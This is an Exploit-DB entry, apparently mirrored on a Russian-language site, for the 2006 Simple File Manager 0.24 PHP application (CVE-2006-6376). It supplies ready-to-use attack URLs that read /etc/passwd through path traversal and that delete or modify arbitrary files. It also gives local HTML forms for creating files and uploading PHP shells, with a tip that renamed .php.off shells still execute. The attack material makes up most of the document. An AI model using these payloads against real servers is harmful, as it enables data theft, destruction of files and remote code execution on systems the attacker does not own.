- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2883
- Проверка EDB
-
- Пройдено
- Автор
- FLAME
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-6376
- Дата публикации
- 2006-12-02
Код:
/*******************************************\
| flame vrs Simple File Manager <=0.24=> |
| http://onedotoh.sourceforge.net/ |
| Various Vulnerbilities Including: |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files |
| Deletion of Arbitrary files |
| Modification of Arbitrary files |
| Creation of Arbitrary files |
| Uploading of Malicious files |
\+++++++++++++++++++++++++++++++++++++++++++/
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based |
| file management utility. |
| It is designed to be used by those that |
| don't want to use ftp or SHOULD NOT use |
| ftp. It can be dropped into a specific |
| directory and give access to that |
| directory as well as any directory below |
| it, including those created by SFM. It |
| can be placed in a specific directory and |
| configured to give access to other |
| directories outside of its location |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as |
| well as directory navigation (within its |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text |
| viewer and mime type downloading. |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
| Thats the description from the author...|
| Which basically outlines all of its |
| vulnerbilities. |
\_________________________________________/
/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE: #
<form name="form1" method="post" action="http://www.site.com/file/fm.php">
<center>Filename: <input type="text" name="newfilename">
<select class=altButton name="newfileext">
<option>.txt</option><option>.html</option><option>.php</option>
</select>
<textarea name="newcontent" cols="60" rows="15"></textarea>
<input type="hidden" name="copt" value="1">
<input type="submit" name="savenew" value="Save">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</center>
</form>
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files) #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE: #
<form name="form1" method="post" action="http://www.site.com/file/fm.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="104857600">
<input type="hidden" name="copt" value="1">
<input type="file" name="uploadedfile">
<input type="submit" name="upload" value="Upload">
<input type="hidden" name="u" value="">
<input type="hidden" name="pathext" value="/">
<input type="hidden" name=sortKey value="2">
</form>
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off #
###########################################################################################################################
\=========================================================================================================================/
/++++++++++++++++++++++++++++\
| Be good, and dont be too |
| hopeful about finding |
| yourself a gibbon running |
| this script. It predates |
| my #999999 hair. |
\++++++++++++++++++++++++++++/
/{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
|---------------------------------------|
| <&bk> stfu flame |
| <~PhaZe_One> no fame without flame |
| <+c|p> I love you flame |
| <%emc2> flame wishes death upon you |
| <Thaimaishu> are you emo flame? |
| <&[myg0t]40> flame dont be mad |
| *~str0ke humps flame's leg |
| <&ZoNe_VoRTeX> <3 flame |
|---------------------------------------|
\{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/
# milw0rm.com [2006-12-02]- Источник
- www.exploit-db.com
